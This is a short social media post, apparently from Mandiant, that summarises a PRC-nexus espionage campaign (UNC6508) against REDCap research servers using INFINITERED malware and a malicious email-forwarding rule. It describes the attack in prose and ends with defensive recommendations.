Post by Mandiant (part of Google Cloud)

🚨 Sophisticated espionage campaign attributed to UNC6508, a PRC-nexus threat actor. The campaign targets the North American academic, medical, and military research community. The threat actor compromised externally facing web applications and remained undetected for over a year, exfiltrating sensitive defense and medical intelligence. UNC6508 consistently targets REDCap (Research Electronic Data Capture) servers, utilizing a custom malware payload tracked as INFINITERED. The attack lifecycle demonstrates advanced operational capabilities: • Intercepting the REDCap upgrade process to inject malicious code and maintain persistent remote access. • Harvesting credentials submitted via POST requests and hiding them encrypted within legitimate local database tables. • Establishing a global hook backdoor that executes on every page load, communicating via specific HTTP Cookie parameters. • Employing Obfuscation (OBF) networks, including compromised routers and residential proxies, to conceal malicious traffic. 🛠️ Novel Technique Following internal reconnaissance and privilege escalation to an enterprise administrator account, UNC6508 deployed a novel data exfiltration technique not previously observed with PRC-nexus actors. The threat actor manipulated domain content compliance rules—a legitimate feature in enterprise productivity suites—to create a malicious rule named "Patroit." This rule used regular expressions to silently BCC-forward emails matching strategic keywords related to military strategy, advanced technology, and specific medical research pathogens to an actor-controlled account. 📋 Defensive Recommendations Defenders must prioritize the rapid application of security patches, the removal of legacy software to prevent downgrade attacks, and the enforcement of phishing-resistant 2-step verification for enterprise administrator accounts. Read the full technical analysis, and get INFINITERED IOCs and YARA rules. 🔗 https://lnkd.in/eDC_SGPz